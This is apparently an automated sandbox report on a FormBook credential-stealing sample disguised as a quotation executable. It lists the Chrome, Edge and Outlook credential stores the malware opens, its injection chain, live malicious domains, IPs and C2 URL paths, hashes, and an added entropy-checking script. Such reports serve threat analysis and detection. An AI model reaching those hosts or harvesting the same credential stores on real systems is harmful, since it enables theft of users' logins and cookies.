Source: Yara match | File source: 00000004.00000002.2589543027.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4007316653.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4008699192.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4010692987.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2590876860.0000000005120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4008790036.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4008647896.0000000002CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2590442326.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\comp.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\comp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: QUOTATON-37839993.exe | Binary or memory string: WIN_81
Source: QUOTATON-37839993.exe | Binary or memory string: WIN_XP
Source: QUOTATON-37839993.exe | Binary or memory string: WIN_XPe
Source: QUOTATON-37839993.exe | Binary or memory string: WIN_VISTA
Source: QUOTATON-37839993.exe | Binary or memory string: WIN_7
Source: QUOTATON-37839993.exe | Binary or memory string: WIN_8
Source: QUOTATON-37839993.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E76283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00E76283
Source: C:\Users\user\Desktop\QUOTATON-37839993.exe | Code function: 0_2_00E76747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00E76747
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
Behavior Graph ID: 1569778 | Sample: QUOTATON-37839993.exe | Startdate: 06/12/2024 | Architecture: WINDOWS | Score: 100

• Start
  Network: www.sfantulandrei.info; www.mffnow.info; 10 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures
  • QUOTATON-37839993.exe (started)
    Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
    • svchost.exe (started)
      Signatures: Maps a DLL or memory area into another process
      • FOBNeEFwBsF.exe (injected)
        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
        • comp.exe (started)
          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
          • FOBNeEFwBsF.exe (injected)
            Network: qqa79.top 38.47.233.21, ports 49857, 80, COGENT-174US, United States; www.gk88top.top 104.21.7.187, ports 49899, 49905, 49912, CLOUDFLARENETUS, United States; 7 other IPs or domains
            Signatures: Found direct / indirect Syscall (likely to bypass EDR)
          • firefox.exe (started)

| Source | Detection | Scanner | Label |
| QUOTATON-37839993.exe | 47% | ReversingLabs | Win32.Trojan.AutoitInject |
| QUOTATON-37839993.exe | 31% | Virustotal | |
| QUOTATON-37839993.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
| Name | IP | Active | Malicious | Reputation |
| qqa79.top | 38.47.233.21 | true | true | unknown |
| webredir.vip.gandi.net | 217.70.184.50 | true | false | high |
| www.127358.win | 206.238.89.119 | true | false | high |
| www.infohive.website | 66.29.149.46 | true | true | unknown |
| dns.ladipage.com | 13.228.81.39 | true | false | high |
| www.gk88top.top | 104.21.7.187 | true | true | unknown |
| www.mffnow.info | 172.67.178.93 | true | true | unknown |
| www.sfantulandrei.info | 199.59.243.227 | true | true | unknown |
| www.3kw40881107247y.click | 172.67.192.207 | true | false | high |
| www.muasamgiare.click | unknown | unknown | false | unknown |
| www.sunnyz.store | unknown | unknown | false | unknown |
| www.qqa79.top | unknown | unknown | false | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
| 38.47.233.21 | qqa79.top | United States | 174 | COGENT-174US | true |
| 172.67.192.207 | www.3kw40881107247y.click | United States | 13335 | CLOUDFLARENETUS | false |
| 104.21.7.187 | www.gk88top.top | United States | 13335 | CLOUDFLARENETUS | true |
| 199.59.243.227 | www.sfantulandrei.info | United States | 395082 | BODIS-NJUS | true |
| 172.67.178.93 | www.mffnow.info | United States | 13335 | CLOUDFLARENETUS | true |
| 217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | false |
| 13.228.81.39 | dns.ladipage.com | United States | 16509 | AMAZON-02US | false |
| 66.29.149.46 | www.infohive.website | United States | 19538 | ADVANTAGECOMUS | true |
| 206.238.89.119 | www.127358.win | United States | 174 | COGENT-174US | false |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1569778
Start date and time: 2024-12-06 10:03:36 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 58s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: QUOTATON-37839993.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@11/9
                                                                    EGA Information:
                                                                    • Successful, ratio: 75%
                                                                    HCA Information:
                                                                    • Successful, ratio: 96%
                                                                    • Number of executed functions: 53
                                                                    • Number of non-executed functions: 276
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target FOBNeEFwBsF.exe, PID 3204 because it is empty
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
38.47.233.21 | CV_ Filipa Barbosa.exe | malicious | FormBook | www.qqa79.top/dp98/
172.67.192.207 | ek8LkB2Cgo.exe | malicious | FormBook | www.3kw40881107247y.click/8292/
172.67.192.207 | Quotation.exe | malicious | FormBook | www.3kw40881107247y.click/6wln/
172.67.192.207 | payments.exe | malicious | FormBook | www.3kw40881107247y.click/6wln/
172.67.192.207 | Company Profile.exe | malicious | FormBook | www.boutiquedangel.com/dc02/?1bNDudv=lPUNoWBtPBWln2k83/A+IJ2u5ZORNmo56U/+UDfBdKbmjZvt5t3YeH5qDhFjWklukbBx&Tp=NBZl4DOPndid
104.21.7.187 | purchase order.exe | malicious | FormBook | www.gk88top.top/4gxa/
104.21.7.187 | attached invoice.exe | malicious | FormBook | www.gk88top.top/4gxa/
199.59.243.227 | lgkWBwqY15.exe | malicious | FormBook | www.bcg.services/5onp/
199.59.243.227 | New quotation request.exe | malicious | FormBook | www.bcg.services/5onp/
199.59.243.227 | SRT68.exe | malicious | FormBook | www.acond-22-mvr.click/9qaj/
199.59.243.227 | ek8LkB2Cgo.exe | malicious | FormBook | www.dating-ml-es.xyz/pvrm/
199.59.243.227 | bestimylover.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher | www.sql.dance/9p84/
199.59.243.227 | SW_5724.exe | malicious | FormBook | www.whisperart.net/27s6/
199.59.243.227 | Ziraat_Swift.hta | malicious | MassLogger RAT, PureLog Stealer | ww7.przvgke.biz/widfafwxfswrij?usid=26&utid=9204703590
199.59.243.227 | 1k24tbb-00241346.exe | malicious | FormBook, PureLog Stealer | www.honk.city/c8xp/
199.59.243.227 | CV_ Filipa Barbosa.exe | malicious | FormBook | www.bcg.services/xz45/
199.59.243.227 | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer | www.acond-22-mvr.click/w9z4/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
webredir.vip.gandi.net | PO# 81136575.exe | malicious | DarkTortilla, FormBook | 217.70.184.50
webredir.vip.gandi.net | Order No 24.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | RFQ.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | statement of accounts.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | RFQ.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | RFQ.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | XhAQ0Rk63O.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | SWIFT.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | #10302024.exe | malicious | FormBook | 217.70.184.50
webredir.vip.gandi.net | rPO-000172483.exe | malicious | FormBook | 217.70.184.50
dns.ladipage.com | New Purchase Order.exe | malicious | FormBook | 54.179.173.60
dns.ladipage.com | Docs.exe | malicious | FormBook, PureLog Stealer | 18.139.62.226
dns.ladipage.com | XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exe | malicious | FormBook, PureLog Stealer | 13.228.81.39
dns.ladipage.com | Swift copy.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | wavjjT3sEq.exe | malicious | FormBook | 54.179.173.60
dns.ladipage.com | COMMERCIAL-DOKUMEN-YANG-DIREVISI.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | Order.exe | malicious | FormBook, PureLog Stealer | 54.179.173.60
dns.ladipage.com | 7v8szLCQAn.exe | malicious | FormBook | 54.179.173.60
dns.ladipage.com | Amended Proforma – SMWD5043.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | AWB_5771388044 Documenti di spedizione.exe | malicious | FormBook | 54.179.173.60
www.127358.win | lgkWBwqY15.exe | malicious | FormBook | 206.238.89.119
www.127358.win | Order MEI PO IM202411484.exe | malicious | FormBook | 206.238.89.119
www.127358.win | IETC-24017.exe | malicious | FormBook, PureLog Stealer | 206.238.89.119
www.127358.win | need quotations.exe | malicious | FormBook | 206.238.89.119
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Voicemail_+Transcription001799.docx | malicious | Unknown | 104.21.96.1
CLOUDFLARENETUS | REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe | malicious | AgentTesla | 104.26.13.205
CLOUDFLARENETUS | fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Siparişi jpeg docx _ .exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.177.134
CLOUDFLARENETUS | http://www.javatpoint.com.cach3.com/ | malicious | Unknown | 104.21.43.239
CLOUDFLARENETUS | hesaphareketi-01.exe | malicious | Snake Keylogger | 104.21.67.152
CLOUDFLARENETUS | Hesap hareketleriniz.exe | malicious | Snake Keylogger | 104.21.67.152
CLOUDFLARENETUS | Fiyat Teklifi_2038900001-MOKAPTO-06122024.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.67.152
CLOUDFLARENETUS | NewOrder12052024.js | malicious | Remcos | 172.67.187.200
CLOUDFLARENETUS | 16547.js | malicious | MassLogger RAT | 172.67.177.134
CLOUDFLARENETUS | https://skillbridge.ca/onlinePaymentverify.html | malicious | Unknown | 104.18.95.41
COGENT-174US | main_x86.elf | malicious | Mirai | 38.151.83.123
COGENT-174US | main_sh4.elf | malicious | Mirai | 38.173.225.205
COGENT-174US | bin.sh.elf | malicious | Mirai | 38.230.130.96
COGENT-174US | MGQeZjDXc3.exe | malicious | FormBook | 38.47.232.196
COGENT-174US | lgkWBwqY15.exe | malicious | FormBook | 206.238.89.119
COGENT-174US | s7Okni1gfE.exe | malicious | FormBook | 38.47.232.196
COGENT-174US | f5TWdT5EAc.exe | malicious | Phorpiex, RHADAMANTHYS, Xmrig | 38.224.37.24
COGENT-174US | https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/ | malicious | Unknown | 38.91.45.7
COGENT-174US | VIP-会员版.exe | malicious | BlackMoon | 114.114.114.114
COGENT-174US | New quotation request.exe | malicious | FormBook | 38.47.232.202
                                                                    No context
                                                                    No context
                                                                    Process:C:\Windows\SysWOW64\comp.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1239949490932863
                                                                    Encrypted:false
                                                                    SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                    MD5:271D5F995996735B01672CF227C81C17
                                                                    SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                    SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                    SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                    Malicious:false
                                                                    Reputation:high, very likely benign file
                                                                    Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\QUOTATON-37839993.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):288256
                                                                    Entropy (8bit):7.993202233484396
                                                                    Encrypted:true
                                                                    SSDEEP:6144:n4gJDE1tfS5rZQZVYbZPPW9mKjRFkd9XaitzgMMDZfRNh:n4gRaS/QbWH29zaailghDZfRNh
                                                                    MD5:5B4B2BB58E9C4179451ED42F457131F3
                                                                    SHA1:B0DD7B1E360580C015161815B07F3A33E23665EE
                                                                    SHA-256:8B41605695AACB561921B45249EFF8BE33E9967CC8F83ADA7455B91A91CBD3F7
                                                                    SHA-512:F13936641C9565AFB4C6B176B91C47D2A7427BF2527A81BDFACBB18C1C3381B631750969ED78365EA99046EAFA2204E593EC9466A1989282EC5D1984D3E63263
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:...PIG66ECFQ..IJ.JG66ACF.ROIJPJG66ACFQROIJPJG66ACFQROIJPJG66.CFQ\P.DP.N...B..s.!##j7DY&1'<r,($>%3.T$c4$<o $p..e.,,"4|BD@tJG66ACF(SF.w0-..V&.{15.S...}VQ.Y...s)-.P..}#!..&*"m* .6ACFQROI..JGz7@CVJK.IJPJG66A.FSSDHAPJ.26ACFQROIJ.^G66QCFQ"KIJP.G6&ACFSROOJPJG66AEFQROIJPJ726AAFQROIJRJ..6ASFQBOIJPZG6&ACFQROYJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJ~>"NBACF..KIJ@JG6bECFAROIJPJG66ACFQRoIJ0JG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQ
                                                                    Process:C:\Users\user\Desktop\QUOTATON-37839993.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):288256
                                                                    Entropy (8bit):7.993202233484396
                                                                    Encrypted:true
                                                                    SSDEEP:6144:n4gJDE1tfS5rZQZVYbZPPW9mKjRFkd9XaitzgMMDZfRNh:n4gRaS/QbWH29zaailghDZfRNh
                                                                    MD5:5B4B2BB58E9C4179451ED42F457131F3
                                                                    SHA1:B0DD7B1E360580C015161815B07F3A33E23665EE
                                                                    SHA-256:8B41605695AACB561921B45249EFF8BE33E9967CC8F83ADA7455B91A91CBD3F7
                                                                    SHA-512:F13936641C9565AFB4C6B176B91C47D2A7427BF2527A81BDFACBB18C1C3381B631750969ED78365EA99046EAFA2204E593EC9466A1989282EC5D1984D3E63263
                                                                    Malicious:false
                                                                    Preview:...PIG66ECFQ..IJ.JG66ACF.ROIJPJG66ACFQROIJPJG66ACFQROIJPJG66.CFQ\P.DP.N...B..s.!##j7DY&1'<r,($>%3.T$c4$<o $p..e.,,"4|BD@tJG66ACF(SF.w0-..V&.{15.S...}VQ.Y...s)-.P..}#!..&*"m* .6ACFQROI..JGz7@CVJK.IJPJG66A.FSSDHAPJ.26ACFQROIJ.^G66QCFQ"KIJP.G6&ACFSROOJPJG66AEFQROIJPJ726AAFQROIJRJ..6ASFQBOIJPZG6&ACFQROYJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJ~>"NBACF..KIJ@JG6bECFAROIJPJG66ACFQRoIJ0JG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQROIJPJG66ACFQ
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.208004252249633
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:QUOTATON-37839993.exe
                                                                    File size:1'226'240 bytes
                                                                    MD5:4fff9ad3ccf6625dc0287e4ba41f0184
                                                                    SHA1:a3b82d53b251831f76e70c02c7ecf7b33741650f
                                                                    SHA256:f001831d4c2b9ff4970e74f952942525cd7a14578f64e39f7a360b94a9f84a73
                                                                    SHA512:f1913dc79250a315abb944af843bf05a3de6861839c520ce0d4266f546d0205e38fb121a7385e90f9e8d62884355ebafefd2342c9453deb51b7a56e3633e952e
                                                                    SSDEEP:24576:Iu6J33O0c+JY5UZ+XC0kGso6Fa1lR302ZuUt6zWY:iu0c++OCvkGs9Fa1lR35gUtNY
                                                                    TLSH:FB45CF2273DEC360CB669173BF69B7057EBF38214A30B95B2F980D7DA950161162C7A3
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                    Icon Hash:aaf3e3e3938382a0
                                                                    Entrypoint:0x427dcd
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x6752356F [Thu Dec 5 23:21:19 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:1
                                                                    File Version Major:5
                                                                    File Version Minor:1
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:1
                                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7
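Two of the static fields above are cheap to re-derive offline when triaging a report like this one: the "Entropy (8bit)" value that drives the Encrypted flag on the dropped files (1.12 for the sparse SQLite database versus 7.99 for the two 288256-byte payload blobs), and the PE TimeDateStamp 0x6752356F. The script below is an added example, not Joe Sandbox code; the sample buffers are constructed, and the 7.5 cut-off used to label a buffer "encrypted" is an assumed value, since the report does not state the threshold it applies.

```python
"""Re-derive the 8-bit entropy and PE timestamp fields of a sandbox report.

Added example, not Joe Sandbox code. "Entropy (8bit)" is Shannon entropy in
bits per byte (0.0 .. 8.0); ENCRYPTED_THRESHOLD is an assumption, the report
does not publish its own cut-off.
"""
import math
import random
from collections import Counter
from datetime import datetime, timezone

ENCRYPTED_THRESHOLD = 7.5  # assumption: not the sandbox's documented value

# Constructed inputs. SPARSE_SQLITE_LIKE mimics a freshly created SQLite file:
# a header followed by mostly zero pages. RANDOM_LIKE is a 288256-byte buffer
# of pseudo-random bytes, the size of the two dropped blobs in the report.
SPARSE_SQLITE_LIKE = b"SQLite format 3\x00" + b"\x00" * 4080 + b"\x37\x04" + b"\x00" * 2000
RANDOM_LIKE = random.Random(1234).randbytes(288256)


def shannon_entropy_8bit(data: bytes) -> float:
    """H = -sum(p_i * log2(p_i)) over the 256 byte values, in bits per byte."""
    if not data:
        return 0.0
    n = len(data)
    h = -sum((c / n) * math.log2(c / n) for c in Counter(data).values())
    return max(0.0, h)  # a single-symbol buffer yields -0.0; normalise it


def looks_encrypted(data: bytes, threshold: float = ENCRYPTED_THRESHOLD) -> bool:
    """High entropy only says 'compressed or encrypted'; it does not tell which."""
    return shannon_entropy_8bit(data) >= threshold


def pe_timestamp(time_date_stamp: int) -> str:
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since the Unix epoch, in UTC.
    Note the field is attacker-controlled and is routinely forged."""
    ts = datetime.fromtimestamp(time_date_stamp, tz=timezone.utc)
    return ts.strftime("%Y-%m-%d %H:%M:%S UTC")


if __name__ == "__main__":
    for name, buf in (("sparse sqlite-like", SPARSE_SQLITE_LIKE), ("random-like", RANDOM_LIKE)):
        print(f"{name}: entropy={shannon_entropy_8bit(buf):.4f} encrypted={looks_encrypted(buf)}")
    print("TimeDateStamp 0x6752356F ->", pe_timestamp(0x6752356F))
```

The timestamp decodes to the value the report prints, which confirms the report's conversion but says nothing about when the binary was really built; a FormBook dropper's compile time is trivially forged. The entropy check is the more useful one for spotting which dropped artefacts carry a packed or encrypted payload and which are ordinary data files.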
                                                                    Instruction
                                                                    call 00007F91ED26352Ah
                                                                    jmp 00007F91ED2562F4h
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
                                                                    int3
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
---- | --------------- | ------------ | -------------
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x62c54 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12a000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
